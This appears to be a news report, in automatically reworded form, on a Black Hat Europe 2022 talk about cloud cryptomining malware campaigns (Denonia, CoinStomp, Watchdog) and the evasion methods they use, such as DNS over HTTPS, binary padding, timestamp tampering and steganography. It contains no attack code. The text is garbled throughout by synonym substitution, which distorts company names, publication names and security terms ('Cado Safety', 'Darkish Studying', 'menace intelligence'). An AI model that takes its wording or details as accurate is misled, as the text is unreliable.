BLACK HAT EUROPE 2022 – London – CoinStomp. Watchdog. Denonia.
These cyberattack campaigns are among the many most prolific threats immediately focusing on cloud methods — and their skill to evade detection ought to function a cautionary story of potential threats to come back, a safety researcher detailed right here immediately.
“Latest cloud-focused malware campaigns have demonstrated that adversary teams have intimate data of cloud applied sciences and their safety mechanisms. And never solely that, they’re utilizing that to their benefit,” stated Matt Muir, menace intelligence engineer for Cado Safety, who shared particulars on these three campaigns his workforce has studied.
Whereas the three assault campaigns are all about cryptomining at this level, a few of their strategies may very well be used for extra nefarious functions. And for essentially the most half, these and different assaults Muir’s workforce has seen are exploiting misconfigured cloud settings and different errors. That for essentially the most half means defending in opposition to them lands within the cloud buyer camp, in response to Muir.
“Realistically for these sorts of assaults, it has extra to do with the consumer than the [cloud] service supplier,” Muir tells Darkish Studying. “They’re very opportunistic. Nearly all of assaults we see have extra to do with errors” by the cloud buyer, he stated.
Maybe essentially the most attention-grabbing improvement with these assaults is that they’re now focusing on serverless computing and containers, he stated. “The convenience of which cloud sources may be compromised has made the cloud a simple goal,” he stated in his presentation, “Actual-World Detection Evasion Strategies within the Cloud.”
DoH, It is a Cryptominer
Denonia malware targets AWS Lambda serverless environments within the cloud. “We consider it is the primary publicly disclosed malware pattern to focus on serverless environments,” Muir stated. Whereas the marketing campaign itself is about cryptomining, the attackers make use of some superior command and management strategies that point out they’re well-studied in cloud know-how.
The Denonia attackers make use of a protocol that implements DNS over HTTPS (aka DoH), which sends DNS queries over HTTPS to DoH-based resolver servers. That offers the attackers a technique to disguise inside encrypted visitors such that AWS cannot view their malicious DNS lookups. “It isn’t the primary malware making use of DoH, nevertheless it actually is not a standard prevalence,” Muir stated. “This prevents the malware to set off an alert” with AWS, he stated.
The attackers additionally appeared to have tossed in additional diversions to distract or confuse safety analysts, 1000’s of strains of consumer agent HTTPS request strings.
“At first we thought it was may be a botnet or DDoS … however in our evaluation it was not really utilized by malware” and as an alternative was a technique to pad the binary in an effort to evade endpoint detection & response (EDR) instruments and malware evaluation, he stated.
Extra Cryptojacking With CoinStomp and Watchdog
CoinStomp is cloud-native malware focusing on cloud safety suppliers in Asia for cryptojacking functions. Its most important modus operandi is timestamp manipulation as an anti-forensics approach, in addition to eradicating system cryptographic insurance policies. It additionally makes use of a C2 household primarily based on a dev/tcp reverse shell to mix into cloud methods’ Unix environments.
Watchdog, in the meantime, has been round since 2019 and is likely one of the extra outstanding cloud-focused menace teams, Muir famous. “They’re opportunistic in exploiting cloud misconfiguration, [detecting those mistakes] by mass scanning.”
The attackers additionally depend on old-school steganography to evade detection, hiding their malware behind picture recordsdata.
“We’re at an attention-grabbing level in cloud malware analysis,” Muir concluded. “Campaigns nonetheless are missing considerably in technicality, which is sweet information for defenders.”
However there’s extra to come back. “Risk actors have gotten extra subtle” and sure will transfer from cryptomining to extra damaging assaults, in response to Muir.
